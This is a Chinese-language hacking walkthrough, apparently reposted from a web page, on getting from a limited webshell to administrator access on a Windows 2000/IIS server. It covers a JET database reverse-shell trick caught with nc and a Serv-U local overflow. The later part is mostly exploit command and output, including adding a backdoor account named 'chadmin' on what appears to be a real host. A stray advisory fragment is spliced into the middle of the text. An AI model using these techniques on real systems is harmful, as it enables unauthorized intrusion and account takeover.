天天看點

jet exploit配合WEBSHELL提升權限

<a href="http://www.3800hk.com/news/w31/17410.html">http://www.3800hk.com/news/w31/17410.html</a>

目标站點是WINDOWS SERVER 2000系統,IIS 5.0 Wscript.shell  shell.application  Wscript.network元件全部删除的情況下測試的,要是什麼都沒删,什麼安全也沒做,那這次測試也沒有什麼意義了.

    現在管理者安全意識提高了,搞站越來越難了,往往拿到一個WEBSHELL,就不知道幹些什麼,除了FSO其他元件都不可以調用,就像這樣的。如圖1

受影響系統:

Microsoft JET DB

不受影響系統:

Microsoft JET DB OLE Provider

較長的描述:

 此資訊由HexView提供(EML:[email protected])

    * Microsoft JET 4.00.8618.0 版

    免疫系統:

    * Microsoft JetDB OLE Provider

先用jet.exe生成一個反彈連接配接的mdb檔案如圖2

OK現在我們就開始連接配接我們生成好的檔案咯,為了防止被防毒軟體XX我改成ASP字尾了.連接配接之前我們先得監聽好端口哦,哪個端口?就是前面設定的,如圖4

現在開始連接配接我剛剛上傳的那個檔案.如圖5

隻要沒出現什麼災難性的錯誤,就表示連接配接成功了,好,看看我們的NC有反映沒有.如圖6

成功得到一個CMDSHELL,不過權限是GUESTS組的.這個時候IIS程序已經死了,所有的ASP檔案都不可執行了.是以你得提前把你的工具什麼的傳上去.我之前已經把serv-u溢出程式傳上去咯,在c:/winnt/system32/inetsrv/data/目錄下 這個目錄預設是EVERYONE完全控制的我想大家都知道,我就不多說.因為都做了權限CMDSHELL下根本沒法跳到WEB目錄.好了,執行我們的SERV-U溢出程式,看看管理者把預設密碼改沒有,啊哈?溢出成功,如圖7

C:/WINNT/system32/inetsrv/Data&gt;ftp 43958 "net user chadmin 520520 /add"

ftp 43958 "net user chadmin 520520 /add"

Serv-u &gt;溢出工具黑貓專版

&lt;220 Serv-U FTP Server v4.0 for WinSock ready...

&gt;USER LocalAdministrator

&lt;331 User name okay, need password.

******************************************************

&lt;230 User logged in, proceed.

&gt;SITE MAINTENANCE

[+] Domain xl:0 Deleted

&lt;505 Domain not found

[+] Creating New Domain...

&lt;200-DomainID=2

[+] Domain xl:2 Created

[+] Creating Evil User

&lt;220 Domain settings saved

200-User=xl

200 User settings saved

[+] Now Exploiting...

&gt;USER xl

&gt;PASS 111111

[+] Now Executing: net user chadmin 520520 /add

&lt;220 Domain deleted

[+] Domain xl:2 Deleted

C:/WINNT/system32/inetsrv/Data&gt;

C:/WINNT/system32/inetsrv/Data&gt;net user

net user

----------------------------------------------------------------

ASPNET                   chadmin                  courses

IUSR_QHMEDIASRV          IWAM_QHMEDIASRV          partner

  SQLDebugger              TsInternetUser

指令成功完成。